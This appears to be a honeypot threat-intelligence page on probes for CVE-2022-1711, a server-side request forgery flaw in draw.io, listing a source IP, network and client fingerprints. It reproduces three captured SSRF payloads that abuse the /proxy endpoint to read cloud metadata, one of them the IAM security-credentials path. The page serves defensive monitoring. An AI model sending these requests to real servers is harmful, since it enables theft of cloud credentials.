CVE-2022-1711: draw.io < 18.0.5 - Server Side Request Forgery (SSRF)
HoneyLabs honeypots recorded 10 probes matching CVE-2022-1711 from 1 distinct source IP addresses in the last 7 days. Severity is rated high.
Request paths that identify it
- /proxy?url=http:
Addresses probing it
| Source IP | Probes | Network | Country |
|---|---|---|---|
| 195.128.248.33 | 10 | Virtual Systems LLC | Ukraine |
Networks it comes from
| ASN | Organisation | Probes | Source IPs |
|---|---|---|---|
| AS6698 | Virtual Systems LLC | 10 | 1 |
Captured requests
- /proxy?url=http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true
- /proxy?url=http://169.254.169.254/latest/user-data
- /proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
HTTP client fingerprints (JA4H)
- ge11nn0400_cf1edba2959c
- ge11nn0500_146937b85f57
CVE report
CVE report
Open a specific CVE from the CVE tracker.